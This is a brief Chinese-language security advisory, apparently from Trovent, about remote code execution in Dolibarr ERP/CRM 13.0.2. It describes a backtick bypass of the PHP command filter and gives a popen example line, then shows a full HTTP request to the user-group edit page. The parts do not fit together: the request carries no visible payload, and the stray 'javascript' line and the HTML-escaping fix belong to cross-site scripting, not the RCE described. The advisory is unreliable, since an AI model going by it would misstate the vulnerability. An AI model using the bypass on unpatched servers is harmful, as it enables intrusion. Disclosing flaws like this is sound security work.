受影响的产品是dolibarr erp和crm。
测试版本为Dolibarr 13.0.2。
在默认设置下,Dolibarr应用程序允许在网站构建器模块中进行远程代码执行。尽管尝试使用像“exec()”、“system()”或“shell_exec()”这样的语句时,应用程序会正确地阻止它们,但我们发现可以通过使用“``”(反引号)来执行代码,这种方法类似于“shell_exec()”或“echo fread(popen('/bin/ls /', 'r'), 4096);”。
代码语言为javascript,代码运行次数为0。以下是用于执行此漏洞的HTTP请求示例:
POST /user/group/card.php HTTP/1.1 Host: 10.11.9.80 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 -securitytest-for-dolibarr Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------329097076628264922392755475836 Content-Length: 950 Origin: http://10.11.9.80 Connection: close Referer: http://10.11.9.80/user/group/card.php?id=1&action=edit&token=4726524fe505b027519a535e08c11fb6 Cookie: PHPSESSID=8s2jl8fhmbm5th8r4baasak1q2; DOLSESSID_736206a821984837877b8a6a901910d2=4jkf7smp24evfm3vvnnunj8jaq Upgrade-Insecure-Requests: 1 -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="token" 6585d0838337cafddc3387fcccbe9d91 -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="action" update -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="backtopage" /user/group/card.php?id=1 -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="id" 1 -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="nom" Troventtest -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="note" -----------------------------329097076628264922392755475836 Content-Disposition: form-data; name="save" Save -----------------------------329097076628264922392755475836--
修复方案包括:
始终对用户输入进行转义,无论其在哪里显示。将所有HTML标签和属性列入黑名单。
此漏洞在Dolibarr版本14.0.0中已被修复,并由Trovent验证。
